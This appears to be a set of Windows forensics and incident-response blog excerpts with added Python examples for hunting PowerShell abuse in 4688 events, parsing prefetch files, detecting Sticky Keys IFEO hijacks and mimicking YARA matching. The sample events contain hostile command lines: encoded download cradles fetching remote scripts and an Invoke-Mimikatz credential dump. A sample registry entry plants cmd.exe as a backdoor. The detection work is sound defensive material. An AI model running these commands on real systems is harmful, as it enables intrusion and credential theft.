The team at FIRST (Forum of Incident Response and Security Teams) reached out to talk about my upcoming presentation on Windows credential attacks at their annual conference. We spoke about why enterprise credential protection is so important and some of the recent Microsoft updates to help minimize the attack surface. The entire Windows credential infrastructure has been under unceasing attack over the last couple of years, and amazingly things are about to get far worse. New tools like Bloodhound and Death Star are using graph databases to effortlessly map account permissions and sessions, greatly magnifying poor credential hygiene. At the moment, it is hard to imagine a larger threat to the enterprise. Podcast:


If you will miss FIRST2017, I will be presenting a complementary presentation at the SANS DFIR Summit on June 22, 2017.

Note:  This article originally appeared on the CrowdStrike blog.  Look here for additional context.

Detecting reconnaissance activity is something that few blue teams spend time on.  Networks are barraged with a near continuous stream of scanning, and determining targeted activity versus Internet noise can be exceedingly difficult.  However, there are a few things you can do to counter activity in this early stage of an attack.

Self-Recon is the Best Recon

Knowing that reconnaissance is ubiquitous, your best defense is to get ahead of the game and scan your own networks.  Schedule regular asset identification and vulnerability scans, and prioritize vulnerability patching.  If someone on your team is regularly testing for SQL injection vulnerabilities in your critical web applications, you won’t have to spend your weekends remediating sqlmap pwnage.  The same preparatory actions can help mitigate both active and passive reconnaissance activity.  Our team regularly helps clients conduct open-source data collection to identify unnecessary information leakage by company or employee assets.  This is exactly what a red team should be doing – helping the organization anticipate attacks and limit their attack surface.

Continue Reading…

PowerShell is becoming ubiquitous in the Microsoft ecosystem, and, while it simplifies administration, it opens up a nearly unprecedented suite of capabilities for attackers.  Nearly every malicious activity imaginable is possible with PowerShell: privilege escalation, credential theft, lateral movement, data destruction, persistence, data exfiltration, and much more.  Malicious PowerShell is being used in the wild, and CrowdStrike has seen an uptick in the number of advanced adversaries employing it during breaches.  Dmitri Alperovitch wrote about one of these actors, Deep Panda, in his article “Deep in Thought: Chinese Targeting of National Security Think Tanks.”  Attackers are leaning more on PowerShell because it is readily available and gets the job done with an added bonus of leaving behind almost no useful forensic artifacts.  Jaron Bradley and I previously tackled the subject of command-line auditing in the CrowdCast, “What Malware? Hunting Command Line Activity”.  I am pleased to report that there have been some significant upgrades to command line logging since that webcast.

Process Creation Events

Starting with Windows 8.1 and Server 2012 R2 (and later backported to Windows 7, Windows 8, Server 2008 R2 and Server 2012 by update KB3004375), Microsoft added a group policy setting, Audit Process Creation > "Include command line in process creation events", that records the full command line of every new process in the Process Tracking audit event (Event ID 4688). One caveat before turning it on: any password or token passed as a command-line argument will now be written to the Security log, so restrict who can read that log accordingly. Continue Reading…
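The command line field only helps if someone looks at it. The following is an added example, not code from the original post or from CrowdStrike: it runs simple hunting logic over a handful of 4688 events constructed for the example (the dictionary keys mirror the 4688 EventData names NewProcessName, CommandLine and SubjectUserName; ParentProcessName is assumed present, which is only true on newer Windows builds). It decodes -EncodedCommand payloads, which PowerShell accepts as base64 of UTF-16LE text, and scores each PowerShell launch on the switches and cradle patterns that rarely appear in legitimate administration.

```python
import base64
import re

# Added example (not code from the original post): hunt Security log 4688 events
# whose command line field is populated for PowerShell abuse. The events are
# constructed by hand; the keys mirror the 4688 EventData names (NewProcessName,
# CommandLine, SubjectUserName; ParentProcessName exists only on newer builds).


def encode_powershell(script: str) -> str:
    """Base64 form powershell.exe expects after -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [  # constructed, not captured
    {"EventID": 4688, "SubjectUserName": "alice",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt'},
    {"EventID": 4688, "SubjectUserName": "alice",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Ep Bypass -Enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly_backup.ps1"},
    {"EventID": 4688, "SubjectUserName": "bob",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString("
                    "'http://203.0.113.7/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\""},
]

# powershell.exe accepts any unambiguous abbreviation of -EncodedCommand (-e, -ec, -en, ...).
_ENC_SWITCHES = sorted({"e", "ec"} | {"encodedcommand"[:i] for i in range(2, 15)}, key=len, reverse=True)
_ENC_RE = re.compile(r"(?<!\S)-(?:" + "|".join(_ENC_SWITCHES) + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

_SWITCH_RULES = [
    (re.compile(r"(?<!\S)-(?:nop|noprofile)\b", re.I), "profile suppressed (-NoProfile)"),
    (re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"(?<!\S)-(?:ep|executionpolicy)\s+bypass\b", re.I), "execution policy bypass"),
    (re.compile(r"(?<!\S)-noni(?:nteractive)?\b", re.I), "non-interactive"),
]
_CONTENT_RULES = [  # applied to the visible command line and the decoded payload
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "download cradle"),
    (re.compile(r"invoke-expression|\biex\b", re.I), "Invoke-Expression"),
    (re.compile(r"frombase64string", re.I), "inline base64 decode"),
    (re.compile(r"invoke-mimikatz|sekurlsa", re.I), "credential theft tooling"),
]
_OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Findings for one 4688 event; an empty reasons list means nothing stood out."""
    image = event["NewProcessName"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "powershell_ise.exe", "pwsh.exe"):
        return {"reasons": [], "decoded": None}
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    reasons = ["encoded command"] if decoded is not None else []
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons += [label for rx, label in _SWITCH_RULES + _CONTENT_RULES if rx.search(text)]
    parent = event.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
    if parent in _OFFICE_PARENTS:
        reasons.append(f"spawned by Office application ({parent})")
    return {"reasons": reasons, "decoded": decoded}


def hunt(events, threshold: int = 2) -> list:
    """(index, user, reasons) for every 4688 event with at least `threshold` findings."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventID") != 4688:
            continue
        result = analyze_event(ev)
        if len(result["reasons"]) >= threshold:
            hits.append((i, ev.get("SubjectUserName"), result["reasons"]))
    return hits


if __name__ == "__main__":
    for idx, user, reasons in hunt(SAMPLE_EVENTS):
        print(f"event #{idx} user={user}: " + "; ".join(reasons))
```

The threshold keeps a lone -ExecutionPolicy Bypass on a scheduled backup script (the third sample event) out of the alert queue, while the Word-spawned encoded download cradle and the Invoke-Mimikatz launch each trip several rules at once. Decoding the payload before matching matters: every content pattern in the second event is invisible in the raw command line.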

It wasn’t that long ago that every report I read containing Windows prefetch artifacts included only the basics: executable name, first and last time executed (now eight timestamps in Win8), and number of executions. There is much more information stored in prefetch files, but until recently there were few tools to easily parse and provide it to the examiner. Mark McKinnon wrote one of the first prefetch parsers to include full path names for additional files accessed within the first ten seconds of application launch. TZWorks’ pf tool now also provides this information. Depending on case type, this information could be overkill, but imagine a prefetch file tracking execution of a malicious binary while also identifying a related malicious DLL loaded, or the location of keylog output. A lot of files are accessed within the first ten seconds of execution, so you may find evidence of specific documents opened in the prefetch file for the Microsoft WinWord application or in the case of Figure 1, files accessed within zip archives via a 7zip prefetch file.


Figure 1: Excerpt showing file access recorded inside a prefetch file (output from TZWorks pf)
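To show what sits inside a prefetch file beyond the basics, here is an added example that is not a tool from the original post: a minimal parser for the uncompressed XP, Vista/7 and 8.1 prefetch layouts (the SCCA signature, the executable name and hash in the header, the run count and last-run timestamps, and the file metrics entries that point into the UTF-16 filename string block). Because real .pf files cannot be shipped with the text, the block also fabricates a sample in memory; the file list, run time and hash value in it are constructed for the example. Windows 10 prefetch files are MAM-compressed and need decompressing before this layout applies.

```python
import struct
from datetime import datetime, timedelta, timezone

# Added example (not a tool from the original post): a minimal parser for the
# uncompressed XP / Vista / 7 / 8.1 prefetch ("SCCA") layout, with a builder that
# fabricates a sample .pf in memory so the parser runs offline. Offsets follow the
# published libscca/ForensicsWiki layout; the sample content (7Z.EXE, the file
# list, the run time and the hash value) is constructed for this example.

HEADER_SIZE = 84  # version, "SCCA", unknown, file size, 60-byte name, hash, unknown
# version: (file-information size, run-count offset, last-run offset, number of
#           last-run timestamps, file-metrics entry size, name offset in entry)
LAYOUT = {
    17: (68, 60, 36, 1, 20, 8),     # Windows XP
    23: (156, 68, 44, 1, 32, 12),   # Windows Vista / 7
    26: (224, 124, 44, 8, 32, 12),  # Windows 8.1: eight run times
}
_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    return _EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    d = dt - _EPOCH
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def build_sample_prefetch(exe, files, run_count, last_runs, version=23) -> bytes:
    """Fabricate an uncompressed .pf with the given name, file list and run data."""
    info_size, rc_rel, lr_rel, n_ts, metric_size, name_rel = LAYOUT[version]
    metrics, names = b"", b""
    for path in files:
        entry = bytearray(metric_size)
        struct.pack_into("<II", entry, name_rel, len(names), len(path))  # offset, chars
        metrics += bytes(entry)
        names += path.encode("utf-16-le") + b"\x00\x00"
    metrics_off = HEADER_SIZE + info_size
    strings_off = metrics_off + len(metrics)
    volumes_off = strings_off + len(names)        # the sample carries no volume block
    buf = bytearray(volumes_off)
    struct.pack_into("<I4sII", buf, 0, version, b"SCCA", 0x11, len(buf))
    buf[16:76] = exe.encode("utf-16-le").ljust(60, b"\x00")
    struct.pack_into("<I", buf, 76, 0x3E8A5C04)  # prefetch hash: arbitrary in the sample
    struct.pack_into("<9I", buf, HEADER_SIZE, metrics_off, len(files), 0, 0,
                     strings_off, len(names), volumes_off, 0, 0)
    for i, ft in enumerate(last_runs[:n_ts]):
        struct.pack_into("<Q", buf, HEADER_SIZE + lr_rel + 8 * i, ft)
    struct.pack_into("<I", buf, HEADER_SIZE + rc_rel, run_count)
    buf[metrics_off:strings_off] = metrics
    buf[strings_off:volumes_off] = names
    return bytes(buf)


def parse_prefetch(data: bytes) -> dict:
    """Executable, run count, run times and every file touched in the first seconds."""
    if data[:3] == b"MAM":
        raise ValueError("Windows 10 prefetch is MAM (LZXPRESS Huffman) compressed; decompress first")
    version, sig = struct.unpack_from("<I4s", data, 0)
    if sig != b"SCCA" or version not in LAYOUT:
        raise ValueError(f"unsupported prefetch signature/version: {sig!r}/{version}")
    _, rc_rel, lr_rel, n_ts, metric_size, name_rel = LAYOUT[version]
    metrics_off, n_metrics, _, _, strings_off, _ = struct.unpack_from("<6I", data, HEADER_SIZE)
    raw_times = struct.unpack_from("<%dQ" % n_ts, data, HEADER_SIZE + lr_rel)
    files = []
    for i in range(n_metrics):
        name_off, name_chars = struct.unpack_from("<II", data, metrics_off + i * metric_size + name_rel)
        start = strings_off + name_off
        files.append(data[start:start + 2 * name_chars].decode("utf-16-le"))
    return {
        "version": version,
        "executable": data[16:76].decode("utf-16-le").split("\x00", 1)[0],
        "hash": "%08X" % struct.unpack_from("<I", data, 76)[0],
        "run_count": struct.unpack_from("<I", data, HEADER_SIZE + rc_rel)[0],
        "last_runs": [filetime_to_datetime(t) for t in raw_times if t],
        "files": files,
    }


def interesting_files(parsed: dict) -> list:
    """Drop OS and application binaries to surface the user data the program touched."""
    noise = ("\\WINDOWS\\", "\\PROGRAM FILES")
    return [f for f in parsed["files"] if not any(n in f.upper() for n in noise)]


SAMPLE_LAST_RUN = datetime(2014, 3, 12, 14, 5, 0, tzinfo=timezone.utc)
SAMPLE_FILES = [
    r"\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\NTDLL.DLL",
    r"\DEVICE\HARDDISKVOLUME1\PROGRAM FILES\7-ZIP\7Z.EXE",
    r"\DEVICE\HARDDISKVOLUME1\USERS\ALICE\DOWNLOADS\INVOICE.ZIP",
    r"\DEVICE\HARDDISKVOLUME1\USERS\ALICE\APPDATA\LOCAL\TEMP\KEYLOG.TXT",
]
SAMPLE_PF = build_sample_prefetch("7Z.EXE", SAMPLE_FILES, 3, [datetime_to_filetime(SAMPLE_LAST_RUN)])

if __name__ == "__main__":
    pf = parse_prefetch(SAMPLE_PF)
    print(f"{pf['executable']}-{pf['hash']}.pf  runs={pf['run_count']}  last={pf['last_runs'][0]}")
    for path in interesting_files(pf):
        print("  ", path)
```

The file metrics entries are what the newer tools mentioned above expose: each one carries an offset and character count into the string block, so a 7-Zip prefetch file records the archive that was opened and a keylogger's prefetch file records where its output went. Filtering out the Windows and Program Files paths is a quick way to see the user data among the dozens of DLLs that every launch touches.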

Continue Reading…

With the release of Internet Explorer 10, Microsoft made a radical departure from the way previous browser artifacts were stored.  The perennial Index.dat records were replaced with a centralized meta-data store for the browser using the proven “JET Blue” Extensible Storage Engine (ESE) database format.  While many forensic examiners have remained blissfully unaware of the ESE format, it has been increasingly used throughout Microsoft products for Exchange, NTDS.DIT, the Windows search database, Windows Live Messenger contacts, and Internet Explorer (IE).  With the introduction of an enterprise-grade database hosting network artifacts, it is now time for every Windows investigator to understand how the database works and what data they may be missing.  Remember that even if a user never opens Internet Explorer, there may still be valuable records in their IE database including files opened on the local system, network shares, and removable devices.  It may also hold evidence of malicious activity including HTTP connections initiated on behalf of malware or suspicious sites visited via links clicked in email clients.  Internet Explorer and its supporting libraries are deeply tied to the Windows operating system and WinINet API functions often interact with IE databases.  Thus IE history, and the WebCache database in particular, continues to be a rich data source during many forensic examinations. Continue Reading…

One of the great pleasures of performing Windows forensics is there is no shortage of application execution artifacts.  Application execution tells us what has run on a system and is often the pivot point that reveals important activity on the system.  Why was FTP run on this workstation?  Is it normal to see execution of Winsvchost.exe?  Why was a privacy cleaning tool used for the first time during the system owner’s last week of work?  While undoubtedly useful, our adversaries are more forensic-aware than ever and often take steps to eliminate application execution artifacts.  At CrowdStrike we routinely encounter nation-state groups that attempt to delete Prefetch.  Even the popular CCleaner anti-forensics tool defaults to clearing Prefetch and UserAssist data.  Hence having additional sources of data can often mean the difference between an easy examination and a long, painful one.

Figure: CCleaner Prefetch Delete

Continue Reading…

The third release of the free CrowdResponse incident response collection tool is now available!  This time around we are including plugins facilitating collection of Windows registry data.  Our inspiration for this release was one of those vulnerabilities that just won’t die, Windows Sticky Keys, and we’ll show how to identify this attack while demonstrating the new additions.

New Plugins

@RegDump [-ds]

RegDump recursively extracts Windows registry key and value data.

-d  Nested output format
-s  Recursive dump
<reg key> Registry key to start dump from

Valid registry hive names are: HKLM, HKCU, HKCR, HKU, and HKAU (pseudo key representing all users)

@RegFile [-scmh]

RegFile searches for registry string values (REG_SZ and REG_EXPAND_SZ) and identifies file path data.  If the file exists on disk, file information, hash, and digital signature details are recorded.  Continue Reading…
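The Sticky Keys attack the release targets is usually set up in one of two ways: the accessibility binary itself is overwritten, or a Debugger value is added under Image File Execution Options so that Windows launches the attacker's program in its place when Shift is pressed five times at the logon screen. The following is an added example, not part of CrowdResponse or the original post: it parses a Regedit 5.00 export constructed for the example (the key path, value name and binary names are the real ones), handles the REG_SZ and REG_EXPAND_SZ encodings that RegFile inspects, and flags every IFEO Debugger entry, rating those that target an accessibility binary as high. Hashing of the referenced file is included as RegFile describes it; signature verification needs Windows APIs and is left out.

```python
import hashlib
import os
import re

# Added example (not part of CrowdResponse or the original post): flag Sticky
# Keys style persistence, where a Debugger value under Image File Execution
# Options makes Windows launch an attacker's binary in place of an accessibility
# tool at the logon screen. The .reg export below is constructed for this
# example; the key path, value name and binary names are the real ones.

IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}

SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"DisableExceptionChainValidation"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"Debugger"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,\
  53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,63,00,6d,00,64,00,2e,00,65,00,78,00,65,00,\
  00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\vsjitdebugger.exe"
"""

_VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"=(.*)')


def parse_reg_export(text: str) -> dict:
    """Minimal Regedit 5.00 export parser: {key: {name: (type, value)}}."""
    text = re.sub(r",\\\r?\n\s*", ",", text)          # join hex continuation lines
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = _VALUE_RE.match(line) if current else None
        if not m:
            continue
        name, raw = m.group(1), m.group(2)
        if raw.startswith('"'):                         # REG_SZ
            keys[current][name] = ("REG_SZ", raw[1:-1].replace('\\"', '"').replace("\\\\", "\\"))
        elif raw.lower().startswith("hex(2):"):         # REG_EXPAND_SZ as UTF-16LE hex
            blob = bytes.fromhex(raw[7:].replace(",", ""))
            keys[current][name] = ("REG_EXPAND_SZ", blob.decode("utf-16-le").split("\x00", 1)[0])
        elif raw.lower().startswith("dword:"):
            keys[current][name] = ("REG_DWORD", int(raw[6:], 16))
    return keys


def expand_env(value: str, env: dict) -> str:
    """Expand %VAR% references the way REG_EXPAND_SZ consumers do."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), value)


def describe_file(path: str):
    """What RegFile records for a referenced file that exists: size and hash
    (Authenticode checking needs Windows APIs and is left out here)."""
    if not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        return {"size": os.path.getsize(path), "sha256": hashlib.sha256(fh.read()).hexdigest()}


def find_ifeo_hijacks(keys: dict, env: dict) -> list:
    """Every IFEO Debugger value, rated high when it targets an accessibility binary."""
    hits = []
    for key, values in keys.items():
        if not key.lower().startswith(IFEO.lower() + "\\"):
            continue
        target = key.rsplit("\\", 1)[-1].lower()
        for name, (rtype, value) in values.items():
            if name.lower() != "debugger" or rtype not in ("REG_SZ", "REG_EXPAND_SZ"):
                continue
            debugger = expand_env(value, env) if rtype == "REG_EXPAND_SZ" else value
            hits.append({"target": target, "debugger": debugger, "type": rtype,
                         "severity": "high" if target in ACCESSIBILITY_BINARIES else "review",
                         "on_disk": describe_file(debugger)})
    return hits


if __name__ == "__main__":
    env = {"SYSTEMROOT": r"C:\Windows"}   # on a live system use os.environ
    for hit in find_ifeo_hijacks(parse_reg_export(SAMPLE_REG_EXPORT), env):
        print(f"[{hit['severity']:6}] {hit['target']} -> {hit['debugger']} ({hit['type']})")
```

The REG_EXPAND_SZ case is the one to get right: an attacker who writes %SystemRoot%\System32\cmd.exe will slip past a check that only looks for the literal C:\Windows path, so the value must be expanded before comparing it. Any Debugger entry outside the accessibility set is still worth a look, but legitimate just-in-time debuggers do register there, hence the lower rating.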

My recent webcast with Jaron Bradley was recorded and a link is available below.  If you have been looking for an excuse to get more familiar with Windows PowerShell, have a look.

What Malware?  Hunting Command Line Activity

There is a reason hackers use the command line, and it isn’t to impress you with their prowess. Throughout the history of Windows, the command line has left far fewer forensic artifacts than equivalent operations via the GUI. To make matters worse, the transition to Windows 7 and 8 has spread PowerShell throughout the enterprise. While it makes our lives easier as defenders, it does the same for our adversaries. Every time you marvel at the capabilities of PowerShell, you should fear how your adversaries may use that power against you.

In this CrowdCast we have collected tips and tricks from our incident responders describing how they are countering the command line threat. Learn to identify when it is in play, extract commands from memory and network packets, and see what is new on the horizon from Microsoft to make tracking command line activity easier.

It has been an interesting year for attacks against the Windows credential model.  If you aren’t familiar with the Mimikatz “Golden Ticket” attack, it represents some of the best justification for guarding your domain administrator credentials with your life (if you really needed additional justification).  CERT-EU published an excellent whitepaper on strategies for mitigating this attack.


CrowdResponse is a free tool written by Robin Keir from CrowdStrike. Robin has a long history of developing excellent tools for the community including SuperScan, BinText, Fpipe, and CrowdInspect. The goal of CrowdResponse is to provide a lightweight solution for incident responders to perform signature detection and triage data collection. It supports all modern Windows platforms up to Server 2012 and is command-line based making it easy to deploy at scale. Version 1.0 focuses on signature detection, with a powerful YARA scanning engine. It ships with a very detailed user manual but since only a few actually read such things, I thought it would be interesting to show the tool in action.

Running YARA Scans

YARA has become one of the leading tools for describing and detecting malware. A YARA rule consists of a set of strings tied together by a Boolean condition. Strings can be plain text, hex byte patterns, wide (UTF-16) text, wildcards, case-insensitive matches, or regular expressions, and combining these options allows construction of precise tests that limit false positives. As an example, consider this YARA rule:

Continue Reading…
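The rule the excerpt refers to is not reproduced on this page. To make the string-and-condition model concrete, here is an added example that is neither the post's rule nor YARA itself: a small re-implementation of YARA's string semantics in Python, showing how the ascii, wide and nocase modifiers turn into byte patterns, how hex strings with ?? wildcards, nibble wildcards and [n-m] jumps are matched, and how the condition combines the results. The rule, the hex stub and the sample buffers are constructed for the example; for real scanning use yara or yara-python.

```python
import re

# Added example, not the rule from the original post (which is not reproduced on
# this page) and not YARA itself: a small re-implementation of YARA's string
# semantics, enough to show how the string modifiers and the Boolean condition
# combine. The rule and the sample buffers are constructed for this example;
# for real scanning use yara or yara-python.


def text_string(s: str, wide=False, ascii=True, nocase=False):
    """YARA text string -> byte regex. 'wide' adds UTF-16LE; 'nocase' ignores case."""
    alts = []
    if ascii:
        alts.append(re.escape(s.encode("ascii")))
    if wide:
        alts.append(re.escape(s.encode("utf-16-le")))
    return re.compile(b"|".join(alts), re.IGNORECASE if nocase else 0)


def hex_string(spec: str):
    """YARA hex string -> byte regex: '??' any byte, '4?' nibble wildcard, '[2-4]' jump."""
    parts = []
    for tok in spec.split():
        if tok.startswith("[") and tok.endswith("]"):
            lo, _, hi = tok[1:-1].partition("-")
            parts.append(b".{%d,%d}" % (int(lo), int(hi or lo)))
        elif "?" in tok:
            hi_nib, lo_nib = tok
            ok = [b for b in range(256)
                  if (hi_nib == "?" or b >> 4 == int(hi_nib, 16))
                  and (lo_nib == "?" or b & 0xF == int(lo_nib, 16))]
            parts.append(b"." if len(ok) == 256 else b"[" + b"".join(re.escape(bytes([b])) for b in ok) + b"]")
        else:
            parts.append(re.escape(bytes.fromhex(tok)))
    return re.compile(b"".join(parts), re.DOTALL)


def scan(strings: dict, condition, data: bytes):
    """Locate every string (offsets, non-overlapping), then evaluate the condition."""
    matches = {name: [m.start() for m in rx.finditer(data)] for name, rx in strings.items()}
    return condition(matches, data), matches


# Equivalent YARA rule (constructed for the example):
#   strings:
#     $mz   = { 4D 5A }
#     $ps   = "powershell" ascii wide nocase
#     $enc  = "-EncodedCommand" ascii wide nocase
#     $stub = { 68 ?? ?? 40 00 E8 [2-4] 83 C4 04 }
#   condition:
#     $mz at 0 and $ps and ($enc or $stub) and filesize < 1MB
SUSPICIOUS_LAUNCHER = {
    "$mz": hex_string("4D 5A"),
    "$ps": text_string("powershell", wide=True, nocase=True),
    "$enc": text_string("-EncodedCommand", wide=True, nocase=True),
    "$stub": hex_string("68 ?? ?? 40 00 E8 [2-4] 83 C4 04"),
}


def suspicious_launcher_condition(m: dict, data: bytes) -> bool:
    return 0 in m["$mz"] and bool(m["$ps"]) and (bool(m["$enc"]) or bool(m["$stub"])) \
        and len(data) < 1024 * 1024


# Constructed buffers: a PE-like blob that embeds a UTF-16 PowerShell command
# line, and a plain script file that mentions PowerShell but is not a PE.
SAMPLE_DROPPER = (b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"\x00" * 64
                  + b"\x68\x10\x20\x40\x00\xe8\x11\x22\x33\x83\xc4\x04"
                  + "PowerShell.exe -NoP -W Hidden -EncodedCommand".encode("utf-16-le"))
SAMPLE_SCRIPT = b"powershell.exe -ExecutionPolicy Bypass -File backup.ps1\r\n"

if __name__ == "__main__":
    for label, blob in (("dropper", SAMPLE_DROPPER), ("script", SAMPLE_SCRIPT)):
        hit, found = scan(SUSPICIOUS_LAUNCHER, suspicious_launcher_condition, blob)
        print(f"{label}: {'MATCH' if hit else 'no match'} {found}")
```

Two details are worth noticing. The dropper stores its command line as UTF-16, so a rule written with an ascii-only "powershell" string never sees it; the wide modifier is what makes the difference. And the plain script matches the $ps string just as well, but the condition anchors $mz at offset 0, so a rule that would otherwise fire on every administrator's .ps1 file stays quiet.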